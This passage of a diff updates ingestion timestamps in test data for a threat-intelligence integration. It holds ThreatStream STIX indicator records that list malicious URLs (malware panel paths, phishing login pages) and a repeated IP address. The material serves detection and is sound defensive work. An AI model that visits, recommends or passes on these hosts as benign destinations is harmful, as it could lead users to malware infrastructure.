"{\"created\":\"2020-02-23T02:54:02.069Z\",\"description\":\"TS ID: 55342497250; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--6d4b1407-6885-4030-beae-43747e458b8a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-23T02:54:02.069Z\",\"name\":\"mal_url: http://portalcafecomnoticias.com.br/test/js/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://portalcafecomnoticias.com.br/test/js/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:02.069Z\"}", "category": "threat", "type": "indicator", 
@@ -29276,7 +29276,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026413Z", + "ingested": "2021-12-14T14:57:43.118451418Z", "original": "{\"created\":\"2020-02-23T02:54:09.172Z\",\"description\":\"TS ID: 55342497312; iType: mal_url; State: active; Org: Unified Layer; Source: CyberCrime\",\"id\":\"indicator--8dd72fce-4734-40a1-8e73-cf44c9319fe1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-54\"],\"modified\":\"2020-02-23T02:54:09.172Z\",\"name\":\"mal_url: http://esenciamaya.com/leo/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://esenciamaya.com/leo/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:09.172Z\"}", "category": "threat", "type": "indicator", @@ -29328,7 +29328,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026419700Z", + "ingested": "2021-12-14T14:57:43.118451823Z", "original": "{\"created\":\"2020-02-23T02:54:15.807Z\",\"description\":\"TS ID: 55342497294; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--27b834b0-4113-4eca-8989-d7ada85d0779\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-23T02:54:15.807Z\",\"name\":\"mal_url: http://febvnxp.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febvnxp.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:15.807Z\"}", "category": "threat", "type": "indicator", 
@@ -29380,7 +29380,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026426500Z", + "ingested": "2021-12-14T14:57:43.118452281Z", "original": "{\"created\":\"2020-02-23T02:54:17.76Z\",\"description\":\"TS ID: 55342497307; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--56334c71-2f84-4e09-a6cc-017577b99970\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:54:17.76Z\",\"name\":\"mal_url: http://febspxi.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febspxi.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:17.76Z\"}", "category": "threat", "type": "indicator", @@ -29425,7 +29425,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026433500Z", + "ingested": "2021-12-14T14:57:43.118452672Z", "original": "{\"created\":\"2020-02-23T02:54:19.374Z\",\"description\":\"TS ID: 55342497313; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime\",\"id\":\"indicator--12abfac3-5251-45f4-bfde-20e3081d0f29\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-54\"],\"modified\":\"2020-02-23T02:54:19.374Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:19.374Z\"}", "category": "threat", "type": "indicator", 
@@ -29477,7 +29477,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026440200Z", + "ingested": "2021-12-14T14:57:43.118453224Z", "original": "{\"created\":\"2020-02-23T02:54:25.477Z\",\"description\":\"TS ID: 55342497258; iType: mal_url; State: active; Org: InMotion Hosting; Source: CyberCrime\",\"id\":\"indicator--8b4fe873-9b07-4985-9818-291623fc07b9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-23T02:54:25.477Z\",\"name\":\"mal_url: http://mawa2ef.com/core/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mawa2ef.com/core/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:25.477Z\"}", "category": "threat", "type": "indicator", @@ -29529,7 +29529,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026446800Z", + "ingested": "2021-12-14T14:57:43.118453792Z", "original": "{\"created\":\"2020-02-23T02:54:39.696Z\",\"description\":\"TS ID: 55342497298; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--c3486bc6-ca92-469f-b0d0-fd8f5cd81580\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-23T02:54:39.696Z\",\"name\":\"mal_url: http://febvnxp.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febvnxp.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:39.696Z\"}", "category": "threat", "type": "indicator", 
@@ -29581,7 +29581,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026453500Z", + "ingested": "2021-12-14T14:57:43.118454226Z", "original": "{\"created\":\"2020-02-23T02:54:39.976Z\",\"description\":\"TS ID: 55342497308; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--0748270e-f010-4598-a389-553d3fffcb48\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:54:39.976Z\",\"name\":\"mal_url: http://febspxi.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febspxi.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:39.976Z\"}", "category": "threat", "type": "indicator", @@ -29626,7 +29626,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026460200Z", + "ingested": "2021-12-14T14:57:43.118454685Z", "original": "{\"created\":\"2020-02-23T02:54:40.035Z\",\"description\":\"TS ID: 55342497254; iType: mal_ip; State: active; Org: PT. Dhecyber Flow Indonesia; Source: CyberCrime\",\"id\":\"indicator--cd075ee5-9b9f-4203-a9a3-c9592a6f6941\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-02-23T02:54:40.035Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:40.035Z\"}", "category": "threat", "type": "indicator", 
@@ -29678,7 +29678,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026466800Z", + "ingested": "2021-12-14T14:57:43.118455251Z", "original": "{\"created\":\"2020-02-23T02:54:40.281Z\",\"description\":\"TS ID: 55342497241; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--ed6fe1be-e6b6-436e-9d8f-f2440d34b32f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-23T02:54:40.281Z\",\"name\":\"mal_url: http://dabain.live/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dabain.live/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:40.281Z\"}", "category": "threat", "type": "indicator", @@ -29723,7 +29723,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026473600Z", + "ingested": "2021-12-14T14:57:43.118455650Z", "original": "{\"created\":\"2020-02-23T02:54:48.232Z\",\"description\":\"TS ID: 55342497251; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--3e220a1d-3d12-4baf-984e-90a3b7431aff\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-59\"],\"modified\":\"2020-02-23T02:54:48.232Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:48.232Z\"}", "category": "threat", "type": "indicator", 
@@ -29775,7 +29775,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026476800Z", + "ingested": "2021-12-14T14:57:43.118456036Z", "original": "{\"created\":\"2020-02-23T02:54:53.263Z\",\"description\":\"TS ID: 55342497316; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--6bc71acc-f3da-4b79-bcc0-7ce4a4a4d4ce\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-23T02:54:53.263Z\",\"name\":\"mal_url: http://89.160.20.156/africa/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/africa/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:53.263Z\"}", "category": "threat", "type": "indicator", @@ -29827,7 +29827,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026481600Z", + "ingested": "2021-12-14T14:57:43.118456539Z", "original": "{\"created\":\"2020-02-23T02:54:54.071Z\",\"description\":\"TS ID: 55342497266; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--1fcdf65f-a35b-4556-a7cc-6c61084af334\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:54:54.071Z\",\"name\":\"mal_url: http://fvrlink.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fvrlink.xyz/P2/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:54:54.071Z\"}", "category": "threat", "type": "indicator", 
@@ -29879,7 +29879,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026486700Z", + "ingested": "2021-12-14T14:57:43.118456981Z", "original": "{\"created\":\"2020-02-23T02:55:00.871Z\",\"description\":\"TS ID: 55342497310; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--b1974beb-95fb-42b7-b2c0-81f71643da88\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-23T02:55:00.871Z\",\"name\":\"mal_url: http://euromopy.tech/rosemond/backup/dataz/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://euromopy.tech/rosemond/backup/dataz/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:55:00.871Z\"}", "category": "threat", "type": "indicator", @@ -29931,7 +29931,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026492500Z", + "ingested": "2021-12-14T14:57:43.118457483Z", "original": "{\"created\":\"2020-02-23T02:55:00.907Z\",\"description\":\"TS ID: 55342497300; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--48501c24-3a05-4f0c-88f1-2a50eaa227ea\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:55:00.907Z\",\"name\":\"mal_url: http://febspxi.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febspxi.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:55:00.907Z\"}", "category": "threat", "type": "indicator", 
@@ -29983,7 +29983,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026496200Z", + "ingested": "2021-12-14T14:57:43.118457882Z", "original": "{\"created\":\"2020-02-23T02:55:00.94Z\",\"description\":\"TS ID: 55342497242; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--6cfdb5ac-7f06-48e6-9ba6-67ade05e01d6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-23T02:55:00.94Z\",\"name\":\"mal_url: http://ovdoker.myjino.ru/dashboard/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ovdoker.myjino.ru/dashboard/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:55:00.94Z\"}", "category": "threat", "type": "indicator", @@ -30035,7 +30035,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026501100Z", + "ingested": "2021-12-14T14:57:43.118458316Z", "original": "{\"created\":\"2020-02-23T02:55:03.894Z\",\"description\":\"TS ID: 55342497264; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--f48e2a6f-9af6-4b9c-b9a7-e2775d552731\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:55:03.894Z\",\"name\":\"mal_url: http://fvrlink.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fvrlink.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:55:03.894Z\"}", "category": "threat", "type": "indicator", 
@@ -30087,7 +30087,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026507900Z", + "ingested": "2021-12-14T14:57:43.118458758Z", "original": "{\"created\":\"2020-02-23T02:55:15.714Z\",\"description\":\"TS ID: 55342497314; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--a3c0fc0a-ae59-495a-a9cc-b2dfe9a494ab\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-23T02:55:15.714Z\",\"name\":\"mal_url: http://epperfums.com/dino/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/dino/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:55:15.714Z\"}", "category": "threat", "type": "indicator", @@ -30138,7 +30138,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026512100Z", + "ingested": "2021-12-14T14:57:43.118459145Z", "original": "{\"created\":\"2020-02-24T02:54:25.932Z\",\"description\":\"TS ID: 55344292231; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--abe3e442-e923-4ad1-b4cb-3695a954a2a0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-02-24T02:54:25.932Z\",\"name\":\"mal_url: http://saind.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://saind.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-24T02:54:25.932Z\"}", "category": "threat", "type": "indicator", 
@@ -30190,7 +30190,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026516600Z", + "ingested": "2021-12-14T14:57:43.118459555Z", "original": "{\"created\":\"2020-02-25T02:52:18.371Z\",\"description\":\"TS ID: 55347597591; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--c19c0ccc-9df8-4804-83da-1c469d220574\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:52:18.371Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/7/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/7/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:18.371Z\"}", "category": "threat", "type": "indicator", @@ -30242,7 +30242,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026519900Z", + "ingested": "2021-12-14T14:57:43.118459943Z", "original": "{\"created\":\"2020-02-25T02:52:27.703Z\",\"description\":\"TS ID: 55347597548; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--00bee6fc-4a90-4160-8493-8176f8cf73ff\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:52:27.703Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/14/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/14/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:27.703Z\"}", "category": "threat", "type": "indicator", 
@@ -30294,7 +30294,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026524600Z", + "ingested": "2021-12-14T14:57:43.118460332Z", "original": "{\"created\":\"2020-02-25T02:52:27.729Z\",\"description\":\"TS ID: 55347597515; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--952cf095-32f4-4b10-8680-499ccd9f784f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-25T02:52:27.729Z\",\"name\":\"mal_url: http://pabloemino.pw/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pabloemino.pw/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:27.729Z\"}", "category": "threat", "type": "indicator", @@ -30345,7 +30345,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026530Z", + "ingested": "2021-12-14T14:57:43.118460806Z", "original": "{\"created\":\"2020-02-25T02:52:27.765Z\",\"description\":\"TS ID: 55347597501; iType: mal_url; State: active; Org: Swiftway Sp. z o.o.; Source: CyberCrime\",\"id\":\"indicator--7f18dccc-1649-44ea-b9c7-e445487506a2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-43\"],\"modified\":\"2020-02-25T02:52:27.765Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:27.765Z\"}", "category": "threat", "type": "indicator", 
@@ -30390,7 +30390,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026535800Z", + "ingested": "2021-12-14T14:57:43.118461193Z", "original": "{\"created\":\"2020-02-25T02:52:27.808Z\",\"description\":\"TS ID: 55347597469; iType: mal_ip; State: active; Org: EuroByte LLC; Source: CyberCrime\",\"id\":\"indicator--4759e40a-5abd-49dc-90fd-2ba8bac1a613\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-25T02:52:27.808Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:27.808Z\"}", "category": "threat", "type": "indicator", @@ -30435,7 +30435,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026543200Z", + "ingested": "2021-12-14T14:57:43.118461578Z", "original": "{\"created\":\"2020-02-25T02:52:37.329Z\",\"description\":\"TS ID: 55347597509; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--ae58138e-b594-4519-adb0-6dbbd8377b75\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-02-25T02:52:37.329Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:37.329Z\"}", "category": "threat", "type": "indicator", 
@@ -30480,7 +30480,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026548900Z", + "ingested": "2021-12-14T14:57:43.118461958Z", "original": "{\"created\":\"2020-02-25T02:52:38.025Z\",\"description\":\"TS ID: 55347597663; iType: mal_ip; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--4c51e9ac-be12-496c-a2d0-7e3536243aef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-39\"],\"modified\":\"2020-02-25T02:52:38.025Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:38.025Z\"}", "category": "threat", "type": "indicator", @@ -30532,7 +30532,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026555600Z", + "ingested": "2021-12-14T14:57:43.118462343Z", "original": "{\"created\":\"2020-02-25T02:52:38.053Z\",\"description\":\"TS ID: 55347597470; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--c36b85d9-df19-439b-8605-d7c4b0653977\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-25T02:52:38.053Z\",\"name\":\"mal_url: http://ayoobtextlie.com/clap/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ayoobtextlie.com/clap/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:38.053Z\"}", "category": "threat", "type": "indicator", 
@@ -30584,7 +30584,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026562300Z", + "ingested": "2021-12-14T14:57:43.118462735Z", "original": "{\"created\":\"2020-02-25T02:52:38.531Z\",\"description\":\"TS ID: 55347597659; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--862bddc3-1b58-45b2-a40d-502d50369e0e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-96\"],\"modified\":\"2020-02-25T02:52:38.531Z\",\"name\":\"mal_url: http://jusqit.com/2/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jusqit.com/2/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:38.531Z\"}", "category": "threat", "type": "indicator", @@ -30635,7 +30635,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026569100Z", + "ingested": "2021-12-14T14:57:43.118463162Z", "original": "{\"created\":\"2020-02-25T02:52:38.564Z\",\"description\":\"TS ID: 55347597488; iType: mal_url; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime\",\"id\":\"indicator--d16f564b-6c1f-4515-97e7-d9a19515dd78\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-25T02:52:38.564Z\",\"name\":\"mal_url: http://webupdateadobe.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://webupdateadobe.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:38.564Z\"}", "category": "threat", "type": "indicator", 
@@ -30687,7 +30687,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026575900Z", + "ingested": "2021-12-14T14:57:43.118463568Z", "original": "{\"created\":\"2020-02-25T02:52:40.276Z\",\"description\":\"TS ID: 55347597520; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--2c31e18b-164e-42bc-afd8-04815a33e043\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:52:40.276Z\",\"name\":\"mal_url: http://gsddfsfasa.pw/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gsddfsfasa.pw/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:40.276Z\"}", "category": "threat", "type": "indicator", @@ -30732,7 +30732,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026582500Z", + "ingested": "2021-12-14T14:57:43.118463988Z", "original": "{\"created\":\"2020-02-25T02:52:40.317Z\",\"description\":\"TS ID: 55347597516; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--8b22f126-3c79-4d20-8e8c-96e50c384ddf\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-25T02:52:40.317Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:40.317Z\"}", "category": "threat", "type": "indicator", 
@@ -30784,7 +30784,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026589200Z", + "ingested": "2021-12-14T14:57:43.118464437Z", "original": "{\"created\":\"2020-02-25T02:52:40.344Z\",\"description\":\"TS ID: 55347597474; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime\",\"id\":\"indicator--387937df-4030-4cfe-91b7-bd9795985adc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:52:40.344Z\",\"name\":\"mal_url: http://atlasdecarqo.com/chief5/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://atlasdecarqo.com/chief5/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:40.344Z\"}", "category": "threat", "type": "indicator", @@ -30829,7 +30829,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.026596100Z", + "ingested": "2021-12-14T14:57:43.118464826Z", "original": "{\"created\":\"2020-02-25T02:52:41.781Z\",\"description\":\"TS ID: 55347597465; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--fca5d6b6-f486-4a46-a8a6-a1a6cb078a08\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-25T02:52:41.781Z\",\"name\":\"mal_ip: 